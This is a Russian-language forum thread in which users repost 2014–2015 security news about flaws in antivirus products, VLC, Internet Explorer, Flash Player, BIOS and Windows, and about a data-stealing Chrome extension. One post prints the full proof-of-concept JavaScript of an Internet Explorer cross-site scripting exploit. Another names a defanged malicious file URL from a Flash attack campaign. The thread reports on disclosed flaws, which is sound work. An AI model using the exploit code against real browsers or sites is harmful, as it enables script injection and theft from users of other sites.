Для тех ,кто решил зарегистрироваться на форуме «Беседка» !
Категорически запрещена регистрация  с одноразового и временного e-mail !Такие пользователи будут отправляться в бан без объяснения причин.
После регистрации необходимо активировать свою учетную запись .Если Вы в почте не обнаружили письмо с активацией рекомендуется проверить папку «Спам».
С уважением
 Администрация форума

Автор Тема: "Опасные " программы для компьютера.  (Прочитано 30034 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Jagron

  • *
  • Сообщений: 7498
  • Пол: Мужской

"Опасные " программы для компьютера.
« Ответ #60 : 31 Октября 2014, 14:34 »
Все нормально у меня .
Странно однако smile21  У меня почему-то так:

Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.


Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #61 : 31 Октября 2014, 15:07 »
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
  :?? вот обновила спецом
 Все ок . Как видите это осел . Вообще то этот мод кроссбраузерный  :??
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.


Оффлайн Jagron

  • *
  • Сообщений: 7498
  • Пол: Мужской

"Опасные " программы для компьютера.
« Ответ #62 : 31 Октября 2014, 16:15 »
Как видите это осел .
Ну так х его знает, чего этому парнокопытному надо?
 stop, у Вас какая версия IE?

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #63 : 31 Октября 2014, 17:09 »
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
11 .  :)
Ну так х его знает, чего этому парнокопытному надо?
8( а потом удивляетесь почему я так негативно отношусь к IE  laug

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #64 : 27 Ноября 2014, 15:44 »
Обнаружены уязвимости в продуктах компаний «Лаборатория Касперского», McAfee и Avast Software
Питерская компания Digital Security сообщила об обнаруженной ей уязвимости в продуктах компаний «Лаборатория Касперского», McAfee и Avast Software.
Уязвимость основана на использовании в антивирусных программах средств аппаратной виртуализации и, по заявлению Digital Security позволяет злоумышленнику получить контроль над ОС и отключить защитное ПО. «Лаборатория Касперского» обвинение отрицает.
Компания Digital Security из Санкт-Петербурга, занятая анализом защищенности систем, заявила об обнаружении ей уязвимостей в популярных антивирусных продуктах: McAfee DeepDefender, Avast DeepScreen и Kaspersky Internet Security 15.

(открыть/скрыть)
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
Поблагодарили: Сержик, kirandpug, potap007, Grafff

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #65 : 21 Января 2015, 10:45 »
В медиа-плеере VLC обнаружены серьезные уязвимости

Бреши позволяют злоумышленнику вызвать повреждение памяти и выполнить произвольный код.
Исследователь безопасности Вейсел Хатас (Veysel Hatas)  опубликовал  подробности о двух уязвимостях в некоторых версиях популярного медиа-плеера VLC. Бреши позволяют злоумышленнику вызвать повреждение памяти и выполнить произвольный код. Одна из уязвимостей связана с нарушением доступа функции предотвращения выполнения данных (DEP), а другая – с доступом к записи данных.
Первая уязвимость, обнаруженная 24 ноября прошлого года, возникает, когда вводимые пользователем данные должным образом не проверяются при обработке специально созданного файла FLV. Подобно первой, вторая брешь возникает, когда вводимые пользователем данные не проверяются корректно при обработке специально созданного файла M2V. Как сообщил Хатас, обе уязвимости могут быть проэксплуатированы «контекстно-зависимым злоумышленником для того, чтобы вызвать повреждение памяти и потенциально выполнить произвольный код».
Бреши, классифицированные как опасные, присутствуют в версиях медиа-плеера VLC 2.1.5 и были протестированы в Windows XP SP3. Поскольку эта платформа больше не поддерживается, а значит, не получит обновлений безопасности, миллионы пользователей по всему миру потенциально подвергаются риску.
Разработчики медиа-плеера VideoLAN получили уведомление о брешах 26 декабря 2014 года, однако исправления до сих пор не выпущены.
 
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
Поблагодарили: Dovf, Grafff

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #66 : 27 Января 2015, 11:46 »
Internet Explorer – наиболее уязвимый компонент Windows

Специалисты международной антивирусной компании ESET проанализировали кибератаки на программные продукты Microsoft за 2014 год.Наибольшее число уязвимостей, закрытых Microsoft в своих продуктах, пришлось на браузер Internet Explorer версий 6-11 – 243 уязвимости. Это почти в два раза больше, чем в 2013 году. Закрытые уязвимости принадлежат к типу «удаленное исполнение кода» и использовались злоумышленниками для скрытой установки вредоносного ПО на компьютеры пользователей.
(открыть/скрыть)
Ряд закрытых уязвимостей в продуктах Microsoft эксплуатировался во вредоносных кампаниях, включая так называемые state-sponsored атаки (кибероружие). В частности, осенью 2014 года специалисты ESET представили данные исследования трояна BlackEnergy. Он использовался для кражи данных корпоративных пользователей из стран Восточной Европы и распространялся с помощью 0day-уязвимости CVE-2014-4114 в операционных системах Windows Vista, Windows 7, Windows 8 и 8.1, а также RT.
Заметную роль в ландшафте угроз информационной безопасности в 2014 году играли drive-by download атаки, которые используются злоумышленниками для скрытой установки вредоносных программ через эксплойты, а также Privilege Escalation (LPE) атаки, позволяющие повысить права атакующих в системе.
«В 2014 году Microsoft внедрила в Internet Explorer и другие продукты ряд нововведений с целью повышения безопасности, – комментирует Артем Баранов, ведущий вирусный аналитик ESET. – Тем не менее, вирусная лаборатория ESET уже неоднократно сообщала о необходимости использования режима Enhanced Protected Mode в IE, особенно в связке с 64-битной версией Windows 8.1. Это позволит существенно поднять планку безопасности при использовании этих продуктов».
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
Поблагодарили: Abay, Dovf, Grafff

Оффлайн Anthrax13

  • *
  • Сообщений: 4099

"Опасные " программы для компьютера.
« Ответ #67 : 27 Января 2015, 13:07 »
Специалисты международной антивирусной компании ESET проанализировали кибератаки на программные продукты Microsoft за 2014 год.Наибольшее число уязвимостей, закрытых Microsoft в своих продуктах, пришлось на браузер Internet Explorer версий 6-11 – 243 уязвимости. Это почти в два раза больше, чем в 2013 году.

Наверное, они поэтому готовят новый браузер

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #68 : 02 Февраля 2015, 22:22 »
Еще одна уязвимость нулевого дня в Adobe Flash Player


Стало известно о появлении 3 уязвимости нулевого дня в Adobe Flash.
Сегодня, 2 февраля, компания Adobe выпустила уведомление безопасности, в котором сообщается об очередной уязвимости нулевого дня в Adobe Flash Player. Это уже третья уязвимость нулевого дня в 2015 году в популярном проигрывателе. Уязвимость получила идентификатор CVE-2015-0313 , а эксплоит к уязвимости входит в состав Angler Exploit Kit.
О новой уязвимости в Adobe Flash сообщили специалисты компании Trend Micro. Согласно исследователям, злоумышленники разместили эксплоит на сайте dailymotion.com. Пользователи этого портала перенаправлялись на файл hxxp://www.retilio.com/skillt.swf, который и осуществлял компрометацию.
В настоящий момент уязвимости присутствует в последней версии Adobe Flash 16.0.0.296. Производитель планирует выпустить экстренное исправление безопасности в течение этой недели. Пока исправление недоступно, SecurityLab рекомендует своим читателям временно отключить уязвимый плагин.
Поблагодарили: potap007

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #69 : 04 Февраля 2015, 22:09 »
Обнаружена XSS уязвимость в Microsoft Internet Explorer

Удаленный пользователь может выполнить произвольный JavaScript сценарий в контексте безопасности любого сайта.
Сегодня появилась информация в публичном доступе о ранее неизвестной уязвимости в Microsoft Internet Explorer. Обнаруженная уязвимость позволяет злоумышленнику обойти политику единства происхождения и выполнить произвольный JavaScript сценарий в браузере жертвы в контексте безопасности произвольного сайта. Для этого жертва должна зайти на страницу, содержащую XSS-эксплоит.

PoC-код эксплоита доступен на сайте deusen.c o.uk. Для демонстрации уязвимости исследователи выбрали сайт
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
.c o.uk. При нажатии на специально сформированную ссылку пользователь перенаправляется на сайт dailymail.c o.uk, после чего ему выводится сообщение «Hacked by Deusen».

Сам код эксплоита выглядит следующим образом:

 function go()
 {
  w=window.frames[0];
  w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
 }
 setTimeout("go()",1000);

Уязвимость присутствует в Internet Explorer 10.x и 11.x.
 
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
Поблагодарили: Dovf

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #70 : 18 Февраля 2015, 21:19 »
Secunia: Эксперты обнаружили 71 уязвимость в Google Chrome

Браузер занимает первое место по количеству найденных брешей за январь 2015 года.
Как сообщает Softpedia со ссылкой на статистику, предоставленную ИБ-компанией Secunia, в web-браузере Google Chrome была обнаружена 71 проблема безопасности. С таким результатом браузер занимает первое место по количеству найденных брешей за январь 2015 года.
В рамках программы по выплате вознаграждения за обнаружение уязвимостей в 2014 году Google заплатила более $1,5 миллиона. Именно данные финансовые поощрения могут объяснить особый интерес, проявленный специалистами именно к Google Chrome.
В статистику Secunia также  попали  три уязвимости нулевого дня Flash Player, которые активно  эксплуатировались  в январе и начале февраля 2015 года. Бреши были нацелены на работу браузеров Mozilla Firefox и Internet Explorer.
В топ-двадцатку по брешам также вошли Oracle Java JRE и SDK, у них обнаружено по 19 уязвимостей, Mozilla Firefox - 16 проблем, Oracle VirtualBox – 13 уязвимостей и в Adobe Flash Player было выявлено 12 уязвимостей.
 
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
Поблагодарили: Dovf

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #71 : 12 Марта 2015, 12:28 »
Атаки с эксплуатацией двух уязвимостей нулевого дня в Flash Player инфицировала тысячи компьютеров

Представители Trend Micro заявили о том, что выявили уже 7600 компьютеров, инфицированных вредоносом Bedep.
Злоумышленники с помощью эксплуатации двух разных уязвимостей нулевого дня в Adobe Flash Player инфицировали тысячи компьютеров. Вредоносная кампания проходила в конце января и в начале февраля 2015 года. Об этом сообщает ИБ-компания Trend Micro на официальном сайте.
Эксплуатация одной из уязвимостей позволила мошенникам использовать рекламные объявления, которые при установке пользователем Flash Player инфицировали его устройство вредоносным ПО Bedep. Бэкдор Bedep позволяет злоумышленникам получить полный контроль над компьютером жертвы.
Первые следы данной атаки были обнаружены еще в ноябре 2014 года, хотя компания Adobe заявила о ней только в начале текущего года.
Представители Trend Micro заявили о том, что выявили уже 7600 компьютеров, инфицированных Bedep. Системы зараженные вредоносом, могут стать частью ботнета, который используется для спама или DoS-атак на крупные организации и компании.
Напомним, ранее стало известно о том, что компания Adobe выпустила срочное обновление для Flash, исправляющее одну из активно эксплуатируемых уязвимостей нулевого дня.
Поблагодарили: Dovf, win10

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

На конференции по IT-безопасности специалисты покажут, насколько важным является своевременное обновление BIOS.
Миллионы некорректных версий BIOS могут быть инфицированы вредоносным ПО с помощью одно-двух минутных кибератак. Большинство пользователей не обновляют BIOS, из-за чего практически в каждой базовой системе ввода/вывода ИБ-эксперты могут обнаружить уязвимость. Об этом сообщает издание The Register.
Завтра, 20 марта, специалисты из компании LegbaCore Ксено Копвах (Xeno Kopvah) и Кори Калленберг (Corey Kallenberg) на конференции по IT-безопасности CanSecWest 2015 в Ванкувере покажут с помощью LightEater-атаки на Gigabyte, Acer, MSI, HP, и Asus, насколько уязвимой является BIOS. Исследователи будут использовать имплантат LightEater в ОС Tails для того, чтобы выкачать GPG-ключи из памяти компьютера на флеш-микросхему.
С помощью атаки специалисты хотят показать, как LightEater может использовать технологию Intel Serial Over Lan для проникновения в базу данных режима системного управления SMM без использования конкретного драйвера NIC. Тем самым эксперты предоставят информацию, которая должна убедить производителей и пользователей заняться более серьезной модификацией всех версий BIOS для предотвращения возможных кибератак.
Поблагодарили: Dovf, Винни Пух

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #73 : 26 Марта 2015, 23:05 »
Дефолтные настройки для Windows 7 и 8.1 позволяют повысить привилегии

Локальный пользователь может повысить свои привилегии на системе и обойти ограничения песочницы.
ИБ-эксперт Google Project Zero Джеймс Форшоу (James Forshaw) обнаружил брешь в настройках по умолчанию в Windows 7 и 8.1.  Проблема позволяет повысить привилегии пользователя в системе, и в некоторых случаях, обойти песочницу для приложений. Злоумышленник способен воспользоваться протоколом NTLM для осуществления атаки на локальный SMB сервер, заставив систему обратиться к WebDAV UNC ресурсу.
Фершоу советует пользователям настроить SPN-проверку для SMB-сервера. ИБ-эксперт также рекомендует отключить сервис web-клиента для того, чтобы усложнить повышение привилегий в локальной системе. К сожалению, это не помешает злоумышленникам совершать атаки, направленные на обход ограничений песочницы.
Форшоу сообщил об этой проблеме в центр обеспечения безопасности Microsoft еще 18 декабря 2014 года. По словам представителей компании, исправление данной проблемы не является для них приоритетным.
Извините, Вам не разрешено просматривать этот текст. Пожалуйста, войдите или зарегистрируйтесь.
Поблагодарили: Винни Пух

Оффлайн ALENA

  • Претензии в свой адрес принимаю... один раз в неделю... вчера!
  • *
  • Сообщений: 79051
  • Пол: Женский

"Опасные " программы для компьютера.
« Ответ #74 : 08 Апреля 2015, 14:19 »
Вредонос в расширении Chrome отправил данные более 1 млн пользователей на один IP-адрес

Расширение Webpage Screenshot содержало вредоносный код, отправлявший копии всех данных о браузерной активности пользователей на американский сервер.
Группа исследователей IT-сервиса ScrapeSentry обнаружила скрытый функционал в популярном бесплатном расширении для браузера Chrome - Webpage Screenshot. Предположительно, вредонос мог отправить данные о браузерной активности более 1,2 млн пользователей на один IP-адрес в США, сообщается в пресс-релизе компании, размещенном на портале SourceWire.
Webpage Screenshot было загружено из online-магазина Google Chrome Extension более 1,2 млн раз. Расширение позволяет делать снимки экрана и хранить их.
Как пояснил один из основателей ScrapeSentry Мартин Зеттерлунд (Martin Zetterlund), его компания занимается выявлением и блокировкой скреперов и ботов, нарушающих условия и правила пользования web-сайтов. В ходе одной из таких проверок специалисты зарегистрировали необычную конфигурацию входящего трафика на одном из ресурсов, что побудило их тщательно исследовать ситуацию.
При ближайшем рассмотрении оказалось, что расширение Webpage Screenshot содержало вредоносный код, отправлявший копии всех данных о браузерной активности пользователей на сервер, расположенный в США. Таким образом, вся важная информация, видимая в заглавии страницы, например, адрес электронной почты при работе с почтовым клиентом, могла быть отправлена на американский IP-адрес без ведома пользователя.
По словам аналитика ScrapeSentry Кристиана Мариолини (Cristian Mariolini), последствия загрузки вредоносного расширения могут быть довольно значительными. Хотя пока не известно, кто и с какой целью собирал информацию, специалисты считают, что ни к чему хорошему это не приведет. В любое время, подчеркивает Мариолини, в приложение может быть добавлен новый вредоносный функционал.
Результаты анализа исследователи ScrapeSentry передали специалистам Google. Расширение Webpage Screenshot уже изъято из магазина Chrome Extension, а его разработчик пока никак не прокомментировал ситуацию.